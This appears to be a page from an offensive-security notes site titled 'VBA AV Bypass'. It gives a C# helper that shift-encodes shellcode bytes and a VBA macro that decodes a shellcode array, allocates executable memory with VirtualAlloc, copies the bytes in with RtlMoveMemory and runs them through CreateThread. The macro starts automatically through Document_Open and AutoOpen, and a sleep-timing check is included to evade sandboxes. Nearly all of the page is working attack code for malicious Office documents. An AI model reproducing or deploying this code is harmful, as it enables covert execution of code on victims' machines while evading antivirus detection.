VBA AV Bypass

vbahelper.exe

using System;
using System.Text;

namespace Helper
{
    internal class Program
    {
        static void Main(string[] args)
        {
            byte[] buf = new byte[5] {
                0xfc,0x48,0x83,0xe4,0xf0};

            byte[] encoded = new byte[buf.Length];
            for(int i = 0; i < buf.Length; i++)
            {
               encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
            }
           
            uint counter = 0;
           
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach(byte b in encoded)
            {
              hex.AppendFormat("{0:D}, ", b);
              counter++;
              if(counter % 50 == 0)
              {
                  hex.AppendFormat("_{0}", Environment.NewLine);
              }
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}

vba that passes AV

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long
    
    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)
    
    If time < 2 Then
        Exit Function
    End If
    
    buf = Array(232, 130, 0, 0, 0, 96, 137…)
    
    For i = 0 To UBound(buf)
    buf(i) = buf(i) - 2
    Next i

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

PreviousFor In-Memory Reflective Load NextPowershell Inside VBA

Last updated 1 year ago